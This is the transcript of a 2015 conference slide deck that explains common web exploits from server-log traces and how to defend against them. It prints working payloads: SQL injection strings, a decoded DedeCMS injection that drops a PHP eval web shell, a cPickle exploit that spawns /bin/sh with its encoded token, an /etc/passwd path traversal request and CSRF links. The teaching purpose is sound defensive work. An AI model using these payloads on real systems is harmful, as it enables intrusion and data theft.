Upgrade to Pro — share decks privately, control downloads, hide ads and more …

App Exploits: Deconstructing for Good, Not Evil

Joël Perras
February 20, 2015
Technology
0
85

App Exploits: Deconstructing for Good, Not Evil

If your web application exists on the public Internet, someone *will* try to exploit it.
Many of these are un-targeted & scripted, their authors hoping that their target will fall to one of the hundreds of un-patched vulnerabilities in frameworks, blog engines or storefronts. Let's go through some common and uncommon exploits in the wild, starting from their traces in server logs, and see how we can detect them and better protect ourselves.

Joël Perras

February 20, 2015
Tweet

More Decks by Joël Perras

See All by Joël Perras
Run Absolutely Everything* With uWSGI
jperras
0
410
An Introduction to Configuration Management with SaltStack
jperras
1
380
Large-Scale Applications with Flask: Doing More With Less
jperras
29
4.1k
Graphs, Edges & Nodes: Untangling the Social Web
jperras
8
850

Other Decks in Technology

See All in Technology
アジャイルと契約 エッセンシャル版 / Agile Contracts Essential Edition
fkino
0
110
日経電子版におけるリアルタイムレコメンドシステム開発の事例紹介/nikkei-realtime-recommender-system
yng87
1
370
プロダクト成長に対応するプラットフォーム戦略:Authleteによる共通認証基盤の移行事例 / Building an authentication platform using Authlete and AWS
kakehashi
1
130
よくわからんサービスについての問い合わせが来たときの強い味方 Amazon Q について
kazzpapa3
0
200
WHOLENESS, REPAIRING, AND TO HAVE FUN: 全体性、修復、そして楽しむこと
snoozer05
PRO
4
6.5k
Shift-from-React-to-Vue
calm1205
1
950
分布で見る効果検証入門 / ai-distributional-effect
cyberagentdevelopers
PRO
4
670
ガバメントクラウド単独利用方式におけるIaC活用
techniczna
3
240
話題のGraphRAG、その可能性と課題を理解する
hide212131
4
1.3k
新卒1年目が挑む!生成AI × マルチエージェントで実現する次世代オンボーディング / operation-ai-onboarding
cyberagentdevelopers
PRO
1
140
君は隠しイベントを見つけれるか?
mujyun
0
200
Hotwire光の道とStimulus
nay3
6
2.4k

Featured

See All Featured
Large-scale JavaScript Application Architecture
addyosmani
510
110k
ピンチをチャンスに:未来をつくるプロダクトロードマップ #pmconf2020
aki_iinuma
106
49k
Build your cross-platform service in a week with App Engine
jlugia
229
18k
Designing for humans not robots
tammielis
249
25k
Faster Mobile Websites
deanohume
304
30k
Intergalactic Javascript Robots from Outer Space
tanoku
268
27k
It's Worth the Effort
3n
183
27k
Done Done
chrislema
181
16k
Fontdeck: Realign not Redesign
paulrobertlloyd
81
5.2k
Six Lessons from altMBA
skipperchong
26
3.4k
XXLCSS - How to scale CSS and keep your sanity
sugarenia
246
1.3M
Designing Dashboards & Data Visualisations in Web Apps
destraynor
228
52k

Transcript

  1. App Exploits DECONSTRUCTED – FOR GOOD, NOT FOR EVIL. By

    Joël, from Fictive Kin

  2. Not if, but when. IT’S ONLY A MATTER OF TIME

  3. A long time ago, IN A HOTEL FAR, FAR AWAY…

  4. None

  5. Of course, he obviously tried to just use any (valid)

    room number with a generic name.

  6. 201 Smith

  7. Overly verbose error messages are the best friend of any

    attacker.

  8. 201 Smith Please verify with the front desk your room

    has been properly checked in and your last name correctly spelled in the hotel registration system.

  9. “Please verify with the front desk your room has been

    properly checked in and your last name correctly spelled in the hotel registration system.”

  10. SELECT  COUNT(id)   FROM  current_guests   WHERE  room_number  =  201

      AND  guest_last_name  =  ‘Smith’;

  11. WHERE  A  AND  B

  12. WHERE  A  AND  B  OR  True

  13. WHERE  (A  AND  B)  OR  True

  14. SELECT  COUNT(id)   FROM  current_guests   WHERE  room_number  =  201

      AND  guest_last_name  =  ‘lolpwned’   OR  1=1;

  15. 201 ‘ OR 1=1;

  16. The lesson here is… DON’T BE LAZY.

  17. The lesson here is… SECURITY IS HARD.

  18. The lesson here is… THAT THERE ARE MANY LESSONS.

  19. Injection Serialization Path Traversal Cross Site Scripting Cross Site Request

    Forgery

  20. Injection Attacks COME IN MANY FLAVOURS

  21. SQL INJECTIONS SANITIZE YOUR INPUTS

  22. 10.58.17.55  -­‐  -­‐  [20/Feb/2015:16:19:35  +0000]  "GET  /page?product_id=arrs1%5B%5D%3D99%26arrs1%5B%5D %3D102%26arrs1%5B%5D%3D103%26arrs1%5B%5D%3D95%26arrs1%5B%5D%3D100%26arrs1%5B%5D%3D98%26arrs1%5B%5D %3D112%26arrs1%5B%5D%3D114%26arrs1%5B%5D%3D101%26arrs1%5B%5D%3D102%26arrs1%5B%5D%3D105%26arrs1%5B%5D %3D120%26arrs2%5B%5D%3D109%26arrs2%5B%5D%3D121%26arrs2%5B%5D%3D116%26arrs2%5B%5D%3D97%26arrs2%5B%5D

    %3D103%26arrs2%5B%5D%3D96%26arrs2%5B%5D%3D32%26arrs2%5B%5D%3D40%26arrs2%5B%5D%3D97%26arrs2%5B%5D %3D105%26arrs2%5B%5D%3D100%26arrs2%5B%5D%3D44%26arrs2%5B%5D%3D101%26arrs2%5B%5D%3D120%26arrs2%5B%5D %3D112%26arrs2%5B%5D%3D98%26arrs2%5B%5D%3D111%26arrs2%5B%5D%3D100%26arrs2%5B%5D%3D121%26arrs2%5B%5D %3D44%26arrs2%5B%5D%3D110%26arrs2%5B%5D%3D111%26arrs2%5B%5D%3D114%26arrs2%5B%5D%3D109%26arrs2%5B%5D %3D98%26arrs2%5B%5D%3D111%26arrs2%5B%5D%3D100%26arrs2%5B%5D%3D121%26arrs2%5B%5D%3D41%26arrs2%5B%5D %3D32%26arrs2%5B%5D%3D86%26arrs2%5B%5D%3D65%26arrs2%5B%5D%3D76%26arrs2%5B%5D%3D85%26arrs2%5B%5D %3D69%26arrs2%5B%5D%3D83%26arrs2%5B%5D%3D40%26arrs2%5B%5D%3D49%26arrs2%5B%5D%3D50%26arrs2%5B%5D %3D51%26arrs2%5B%5D%3D52%26arrs2%5B%5D%3D53%26arrs2%5B%5D%3D54%26arrs2%5B%5D%3D44%26arrs2%5B%5D %3D64%26arrs2%5B%5D%3D96%26arrs2%5B%5D%3D92%26arrs2%5B%5D%3D39%26arrs2%5B%5D%3D96%26arrs2%5B%5D %3D44%26arrs2%5B%5D%3D39%26arrs2%5B%5D%3D123%26arrs2%5B%5D%3D100%26arrs2%5B%5D%3D101%26arrs2%5B%5D %3D100%26arrs2%5B%5D%3D101%26arrs2%5B%5D%3D58%26arrs2%5B%5D%3D112%26arrs2%5B%5D%3D104%26arrs2%5B%5D %3D112%26arrs2%5B%5D%3D125%26arrs2%5B%5D%3D102%26arrs2%5B%5D%3D105%26arrs2%5B%5D%3D108%26arrs2%5B%5D %3D101%26arrs2%5B%5D%3D95%26arrs2%5B%5D%3D112%26arrs2%5B%5D%3D117%26arrs2%5B%5D%3D116%26arrs2%5B%5D %3D95%26arrs2%5B%5D%3D99%26arrs2%5B%5D%3D111%26arrs2%5B%5D%3D110%26arrs2%5B%5D%3D116%26arrs2%5B%5D %3D101%26arrs2%5B%5D%3D110%26arrs2%5B%5D%3D116%26arrs2%5B%5D%3D115%26arrs2%5B%5D%3D40%26arrs2%5B%5D %3D39%26arrs2%5B%5D%3D39%26arrs2%5B%5D%3D120%26arrs2%5B%5D%3D115%26arrs2%5B%5D%3D118%26arrs2%5B%5D %3D105%26arrs2%5B%5D%3D112%26arrs2%5B%5D%3D46%26arrs2%5B%5D%3D112%26arrs2%5B%5D%3D104%26arrs2%5B%5D %3D112%26arrs2%5B%5D%3D39%26arrs2%5B%5D%3D39%26arrs2%5B%5D%3D44%26arrs2%5B%5D%3D39%26arrs2%5B%5D %3D39%26arrs2%5B%5D%3D60%26arrs2%5B%5D%3D63%26arrs2%5B%5D%3D112%26arrs2%5B%5D%3D104%26arrs2%5B%5D %3D112%26arrs2%5B%5D%3D32%26arrs2%5B%5D%3D101%26arrs2%5B%5D%3D118%26arrs2%5B%5D%3D97%26arrs2%5B%5D %3D108%26arrs2%5B%5D%3D40%26arrs2%5B%5D%3D36%26arrs2%5B%5D%3D95%26arrs2%5B%5D%3D80%26arrs2%5B%5D %3D79%26arrs2%5B%5D%3D83%26arrs2%5B%5D%3D84%26arrs2%5B%5D%3D91%26arrs2%5B%5D%3D120%26arrs2%5B%5D %3D105%26arrs2%5B%5D%3D110%26arrs2%5B%5D%3D115%26arrs2%5B%5D%3D117%26arrs2%5B%5D%3D105%26arrs2%5B%5D %3D93%26arrs2%5B%5D%3D41%26arrs2%5B%5D%3D59%26arrs2%5B%5D%3D63%26arrs2%5B%5D%3D62%26arrs2%5B%5D %3D120%26arrs2%5B%5D%3D105%26arrs2%5B%5D%3D110%26arrs2%5B%5D%3D115%26arrs2%5B%5D%3D117%26arrs2%5B%5D %3D105%26arrs2%5B%5D%3D39%26arrs2%5B%5D%3D39%26arrs2%5B%5D%3D41%26arrs2%5B%5D%3D59%26arrs2%5B%5D %3D123%26arrs2%5B%5D%3D47%26arrs2%5B%5D%3D100%26arrs2%5B%5D%3D101%26arrs2%5B%5D%3D100%26arrs2%5B%5D %3D101%26arrs2%5B%5D%3D58%26arrs2%5B%5D%3D112%26arrs2%5B%5D%3D104%26arrs2%5B%5D%3D112%26arrs2%5B%5D %3D125%26arrs2%5B%5D%3D39%26arrs2%5B%5D%3D41%26arrs2%5B%5D%3D32%26arrs2%5B%5D%3D35%26arrs2%5B%5D %3D32%26arrs2%5B%5D%3D64%26arrs2%5B%5D%3D96%26arrs2%5B%5D%3D92%26arrs2%5B%5D%3D39%26arrs2%5B%5D%3D96…

  23. 10.58.17.55  -­‐  -­‐  [20/Feb/2015:16:19:35  +0000]  "GET  /page?product_id=arrs1%5B%5D%3D99%26arrs1%5B%5D %3D102%26arrs1%5B%5D%3D103%26arrs1%5B%5D%3D95%26arrs1%5B%5D%3D100%26arrs1%5B%5D%3D98%26arrs1%5B%5D %3D112%26arrs1%5B%5D%3D114%26arrs1%5B%5D%3D101%26arrs1%5B%5D%3D102%26arrs1%5B%5D%3D105%26arrs1%5B%5D %3D120%26arrs2%5B%5D%3D109%26arrs2%5B%5D%3D121%26arrs2%5B%5D%3D116%26arrs2%5B%5D%3D97%26arrs2%5B%5D

    %3D103%26arrs2%5B%5D%3D96%26arrs2%5B%5D%3D32%26arrs2%5B%5D%3D40%26arrs2%5B%5D%3D97%26arrs2%5B%5D %3D105%26arrs2%5B%5D%3D100%26arrs2%5B%5D%3D44%26arrs2%5B%5D%3D101%26arrs2%5B%5D%3D120%26arrs2%5B%5D %3D112%26arrs2%5B%5D%3D98%26arrs2%5B%5D%3D111%26arrs2%5B%5D%3D100%26arrs2%5B%5D%3D121%26arrs2%5B%5D %3D44%26arrs2%5B%5D%3D110%26arrs2%5B%5D%3D111%26arrs2%5B%5D%3D114%26arrs2%5B%5D%3D109%26arrs2%5B%5D %3D98%26arrs2%5B%5D%3D111%26arrs2%5B%5D%3D100%26arrs2%5B%5D%3D121%26arrs2%5B%5D%3D41%26arrs2%5B%5D %3D32%26arrs2%5B%5D%3D86%26arrs2%5B%5D%3D65%26arrs2%5B%5D%3D76%26arrs2%5B%5D%3D85%26arrs2%5B%5D %3D69%26arrs2%5B%5D%3D83%26arrs2%5B%5D%3D40%26arrs2%5B%5D%3D49%26arrs2%5B%5D%3D50%26arrs2%5B%5D %3D51%26arrs2%5B%5D%3D52%26arrs2%5B%5D%3D53%26arrs2%5B%5D%3D54%26arrs2%5B%5D%3D44%26arrs2%5B%5D %3D64%26arrs2%5B%5D%3D96%26arrs2%5B%5D%3D92%26arrs2%5B%5D%3D39%26arrs2%5B%5D%3D96%26arrs2%5B%5D %3D44%26arrs2%5B%5D%3D39%26arrs2%5B%5D%3D123%26arrs2%5B%5D%3D100%26arrs2%5B%5D%3D101%26arrs2%5B%5D %3D100%26arrs2%5B%5D%3D101%26arrs2%5B%5D%3D58%26arrs2%5B%5D%3D112%26arrs2%5B%5D%3D104%26arrs2%5B%5D %3D112%26arrs2%5B%5D%3D125%26arrs2%5B%5D%3D102%26arrs2%5B%5D%3D105%26arrs2%5B%5D%3D108%26arrs2%5B%5D %3D101%26arrs2%5B%5D%3D95%26arrs2%5B%5D%3D112%26arrs2%5B%5D%3D117%26arrs2%5B%5D%3D116%26arrs2%5B%5D %3D95%26arrs2%5B%5D%3D99%26arrs2%5B%5D%3D111%26arrs2%5B%5D%3D110%26arrs2%5B%5D%3D116%26arrs2%5B%5D %3D101%26arrs2%5B%5D%3D110%26arrs2%5B%5D%3D116%26arrs2%5B%5D%3D115%26arrs2%5B%5D%3D40%26arrs2%5B%5D %3D39%26arrs2%5B%5D%3D39%26arrs2%5B%5D%3D120%26arrs2%5B%5D%3D115%26arrs2%5B%5D%3D118%26arrs2%5B%5D %3D105%26arrs2%5B%5D%3D112%26arrs2%5B%5D%3D46%26arrs2%5B%5D%3D112%26arrs2%5B%5D%3D104%26arrs2%5B%5D %3D112%26arrs2%5B%5D%3D39%26arrs2%5B%5D%3D39%26arrs2%5B%5D%3D44%26arrs2%5B%5D%3D39%26arrs2%5B%5D %3D39%26arrs2%5B%5D%3D60%26arrs2%5B%5D%3D63%26arrs2%5B%5D%3D112%26arrs2%5B%5D%3D104%26arrs2%5B%5D %3D112%26arrs2%5B%5D%3D32%26arrs2%5B%5D%3D101%26arrs2%5B%5D%3D118%26arrs2%5B%5D%3D97%26arrs2%5B%5D %3D108%26arrs2%5B%5D%3D40%26arrs2%5B%5D%3D36%26arrs2%5B%5D%3D95%26arrs2%5B%5D%3D80%26arrs2%5B%5D %3D79%26arrs2%5B%5D%3D83%26arrs2%5B%5D%3D84%26arrs2%5B%5D%3D91%26arrs2%5B%5D%3D120%26arrs2%5B%5D %3D105%26arrs2%5B%5D%3D110%26arrs2%5B%5D%3D115%26arrs2%5B%5D%3D117%26arrs2%5B%5D%3D105%26arrs2%5B%5D %3D93%26arrs2%5B%5D%3D41%26arrs2%5B%5D%3D59%26arrs2%5B%5D%3D63%26arrs2%5B%5D%3D62%26arrs2%5B%5D %3D120%26arrs2%5B%5D%3D105%26arrs2%5B%5D%3D110%26arrs2%5B%5D%3D115%26arrs2%5B%5D%3D117%26arrs2%5B%5D %3D105%26arrs2%5B%5D%3D39%26arrs2%5B%5D%3D39%26arrs2%5B%5D%3D41%26arrs2%5B%5D%3D59%26arrs2%5B%5D %3D123%26arrs2%5B%5D%3D47%26arrs2%5B%5D%3D100%26arrs2%5B%5D%3D101%26arrs2%5B%5D%3D100%26arrs2%5B%5D %3D101%26arrs2%5B%5D%3D58%26arrs2%5B%5D%3D112%26arrs2%5B%5D%3D104%26arrs2%5B%5D%3D112%26arrs2%5B%5D %3D125%26arrs2%5B%5D%3D39%26arrs2%5B%5D%3D41%26arrs2%5B%5D%3D32%26arrs2%5B%5D%3D35%26arrs2%5B%5D %3D32%26arrs2%5B%5D%3D64%26arrs2%5B%5D%3D96%26arrs2%5B%5D%3D92%26arrs2%5B%5D%3D39%26arrs2%5B%5D%3D96…

  24. arrs1%5B%5D%3D99 URLENCODED

  25. arrs1[]=99 QUERY ARGS ARE KEY/VAL PAIRS OF ARRAYS AND INTEGERS

  26. arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[] =112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109 &arrs2[]=121&arrs2[]=116&arrs2[]=97&arrs2[]=103&arrs2[]=96&arrs2[]=32&arrs2[ ]=40&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=44&arrs2[]=101&arrs2[]=120&a rrs2[]=112&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=44&arrs2[] =110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100& arrs2[]=121&arrs2[]=41&arrs2[]=32&arrs2[]=86&arrs2[]=65&arrs2[]=76&arrs2[]=8 5&arrs2[]=69&arrs2[]=83&arrs2[]=40&arrs2[]=49&arrs2[]=50&arrs2[]=51&arrs2[]= 52&arrs2[]=53&arrs2[]=54&arrs2[]=44&arrs2[]=64&arrs2[]=96&arrs2[]=92&arrs2[] =39&arrs2[]=96&arrs2[]=44&arrs2[]=39&arrs2[]=123&arrs2[]=100&arrs2[]=101&arr

    s2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]= 125&arrs2[]=102&arrs2[]=105&arrs2[]=108&arrs2[]=101&arrs2[]=95&arrs2[]=112&a rrs2[]=117&arrs2[]=116&arrs2[]=95&arrs2[]=99&arrs2[]=111&arrs2[]=110&arrs2[] =116&arrs2[]=101&arrs2[]=110&arrs2[]=116&arrs2[]=115&arrs2[]=40&arrs2[]=39&a rrs2[]=39&arrs2[]=120&arrs2[]=115&arrs2[]=118&arrs2[]=105&arrs2[]=112&arrs2[ ]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=39&arrs2[]=39&arrs2[]=44&ar rs2[]=39&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=11 2&arrs2[]=32&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&arrs2 []=36&arrs2[]=95&arrs2[]=80&arrs2[]=79&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs 2[]=120&arrs2[]=105&arrs2[]=110&arrs2[]=115&arrs2[]=117&arrs2[]=105&arrs2[]= 93&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=120&arrs2[]=105&arrs2 []=110&arrs2[]=115&arrs2[]=117&arrs2[]=105&arrs2[]=39&arrs2[]=39&arrs2[]=41& arrs2[]=59&arrs2[]=123&arrs2[]=47&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[ ]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=39& arrs2[]=41&arrs2[]=32&arrs2[]=35&arrs2[]=32&arrs2[]=64&arrs2[]=96&arrs2[]=92 &arrs2[]=39&arrs2[]=96

  27. arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[] =112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109 &arrs2[]=121&arrs2[]=116&arrs2[]=97&arrs2[]=103&arrs2[]=96&arrs2[]=32&arrs2[ ]=40&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=44&arrs2[]=101&arrs2[]=120&a rrs2[]=112&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=44&arrs2[] =110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100& arrs2[]=121&arrs2[]=41&arrs2[]=32&arrs2[]=86&arrs2[]=65&arrs2[]=76&arrs2[]=8 5&arrs2[]=69&arrs2[]=83&arrs2[]=40&arrs2[]=49&arrs2[]=50&arrs2[]=51&arrs2[]= 52&arrs2[]=53&arrs2[]=54&arrs2[]=44&arrs2[]=64&arrs2[]=96&arrs2[]=92&arrs2[] =39&arrs2[]=96&arrs2[]=44&arrs2[]=39&arrs2[]=123&arrs2[]=100&arrs2[]=101&arr

    s2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]= 125&arrs2[]=102&arrs2[]=105&arrs2[]=108&arrs2[]=101&arrs2[]=95&arrs2[]=112&a rrs2[]=117&arrs2[]=116&arrs2[]=95&arrs2[]=99&arrs2[]=111&arrs2[]=110&arrs2[] =116&arrs2[]=101&arrs2[]=110&arrs2[]=116&arrs2[]=115&arrs2[]=40&arrs2[]=39&a rrs2[]=39&arrs2[]=120&arrs2[]=115&arrs2[]=118&arrs2[]=105&arrs2[]=112&arrs2[ ]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=39&arrs2[]=39&arrs2[]=44&ar rs2[]=39&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=11 2&arrs2[]=32&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&arrs2 []=36&arrs2[]=95&arrs2[]=80&arrs2[]=79&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs 2[]=120&arrs2[]=105&arrs2[]=110&arrs2[]=115&arrs2[]=117&arrs2[]=105&arrs2[]= 93&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=120&arrs2[]=105&arrs2 []=110&arrs2[]=115&arrs2[]=117&arrs2[]=105&arrs2[]=39&arrs2[]=39&arrs2[]=41& arrs2[]=59&arrs2[]=123&arrs2[]=47&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[ ]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=39& arrs2[]=41&arrs2[]=32&arrs2[]=35&arrs2[]=32&arrs2[]=64&arrs2[]=96&arrs2[]=92 &arrs2[]=39&arrs2[]=96

  28. 99,  102,  103,  95,  100,  98,  112,  114,  101,  102,

      105,  120,  109,  121,  116,  97,  103,  96,  32,  40,   97,  105,  100,  44,  101,  120,  112,  98,  111,  100,   121,  44,  110,  111,  114,  109,  98,  111,  100,   121,  41,  32,  86,  65,  76,  85,  69,  83,  40,  49,   50,  51,  52,  53,  54,  44,  64,  96,  92,  39,  96,   44,  39,  123,  100,  101,  100,  101,  58,  112,  104,   112,  125,  102,  105,  108,  101,  95,  112,  117,   116,  95,  99,  111,  110,  116,  101,  110,  116,   115,  40,  39,  39,  120,  115,  118,  105,  112,  46,   112,  104,  112,  39,  39,  44,  39,  39,  60,  63,   112,  104,  112,  32,  101,  118,  97,  108,  40,  36,   95,  80,  79,  83,  84,  91,  120,  105,  110,  115,   117,  105,  93,  41,  59,  63,  62,  120,  105,  110,   115,  117,  105,  39,  39,  41,  59,  123,  47,  100,   101,  100,  101,  58,  112,  104,  112,  125,  39,  41,   32,  35,  32,  64,  96,  92,  39,  96

  29. In  [1]:  input  =  "arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95…"   In  [2]:  parsed  =

     input.split('&')   In  [3]:  v  =  [int(p.split('=')[1])  for  p  in  parsed  if  p  is  not  '']   In  [4]:  print  ''.join(chr(i)  for  i  in  v)  

  30. cfg_dbprefixmytag`  (aid,expbody,normbody)   VALUES(123456,@`\'`,'{dede:php} file_put_contents(''xsvip.php'',''<?php   eval($_POST[xinsui]);?>xinsui'');{/dede:php}')  #  @`\'`

  31. cfg_dbprefixmytag`  (aid,expbody,normbody)   VALUES(123456,@`\'`,'{dede:php} file_put_contents(''xsvip.php'',''<?php   eval($_POST[xinsui]);?>xinsui'');{/dede:php}')  #  @`\'`

  32. cfg_dbprefixmytag`  (aid,expbody,normbody)   VALUES(123456,@`\'`,'{dede:php} file_put_contents(''xsvip.php'',''<?php   eval($_POST[xinsui]);?>xinsui'');{/dede:php}')  #  @`\'`

  33. cfg_dbprefixmytag`  (aid,expbody,normbody)   VALUES(123456,@`\'`,'{dede:php} file_put_contents(''xsvip.php'',''<?php   eval($_POST[xinsui]);?>xinsui'');{/dede:php}')  #  @`\'`

  34. None

  35. In Communist China, CMS HACK YOU!

  36. The lesson here is… SANITIZE YOUR INPUTS! ESCAPE YOUR OUTPUTS!

  37. EX POST FACTO DETECTION LOG INVALID DATABASE QUERIES.

  38. LOG INJECTIONS COVERING UP THE DETAILS

  39. def  log_failed_login(username):          with  open("access.log",  'a')  as

     f:                  f.write("User  login  failed  for:  %s\n"  %  username)  

  40. guest\nUser  login  succeeded  for:  admin Here’s my username

  41. User  login  failed  for:  guest\n   User  login  succeeded  for:

     admin\n

  42. The lesson here is… SANITIZE YOUR INPUTS! ESCAPE YOUR OUTPUTS!

  43. Serialization Attacks …ALSO COME IN SEVERAL FLAVOURS.

  44. Object Serialization DON’T TRUST YOUR OWN CACHE

  45. <?php   $messages  =  array("sekret"  =>  ‘blue’);   echo  serialize($messages);

      ?>

  46. a:1:{s:6:"sekret";s:4:"blue";}

  47. PHP unserialize() can instantiate objects. Serializing objects containing user input

    is, fundamentally, dangerous.

  48. Magic Methods will be your downfall __wakeup(), __destruct()

  49. http://www.slideshare.net/phdays/php-wordpress

  50. http://www.slideshare.net/phdays/php-wordpress

  51. http://www.slideshare.net/phdays/php-wordpress

  52. Object Serialization …IN YOUR COOKIES.

  53. People forget that users can (sometimes) modify cookies $_COOKIE

  54. a:2:{s:2:"id";s:1:"1";s:4:"name";s:4:"Joel";} array("id" => '1', 'name' => 'Joel')

  55. PHP is not Alone PYTHON cPICKLE HAS SIMILAR ISSUES

  56. class AuthedProtocol(protocol.Protocol): def verify(self, headers): try: token = cPickle.loads(base64.b64decode(headers['AuthToken'])) if

    not check_hmac(token['signature'], token['data'], getSecretKey()): raise SomeError self.secure_data = token['data'] except: raise SomeError

  57. class AuthedProtocol(protocol.Protocol): def verify(self, headers): try: token = cPickle.loads(base64.b64decode(headers['AuthToken'])) if

    not check_hmac(token['signature'], token['data'], getSecretKey()): raise SomeError self.secure_data = token['data'] except: raise SomeError

  58. import cPickle, subprocess, base64 class Hackzor(object): def __reduce__(self): return (subprocess.Popen,

    (('/bin/sh',),))

  59. AuthToken: Y3N1YnByb2Nlc3MKUG9wZW4KcDEKKChTJy9iaW4vc2gnCnAyCnRwMwp0cDQKUnA1Ci4= base64.b64encode(cPickle.dumps(RunBinSh()))

  60. Path Traversals FILES THAT SHOULDN’T BE SEEN

  61. $pdf  =  $_GET[‘pdf’];   $filename  =  “/var/www/$pdf”;   readfile($filename);

  62. GET /documents?pdf=../../etc/passwd

  63. $pdf  =  $_GET[‘pdf’];   $filename  =  “/var/www/../../etc/passwd”;   readfile($filename);

  64. The lesson here is… SANITIZE YOUR INPUTS! LIMIT SURFACE AREA

    (open_basedir etc.) PERMISSIONS MEAN THINGS! CHROOT IS YOUR FRIEND!

  65. CSRF …OR WHEN EVERYONE LIKED HAVING SEX WITH GOATS ON

    TWITTER
  66. None

  67. CSRF requires some social engineering “Hey, click this link for

    free money!”

  68. href=“/status?update=LOLPWNED”

  69. href=“/account?transfer=1billion&to=jperras”

  70. The lesson here is… USE CSRF TOKENS PER REQUEST! Access-Control-Allow-Origin!

  71. What’s a developer to do?

  72. Logging, logging, logging Intrusion Detection System (IDS) Security Mailing Lists

    Error notification systems (Sentry) … try to be smarter

  73. @jperras Joël Perras http://nerderati.com

  74. joind.in/13329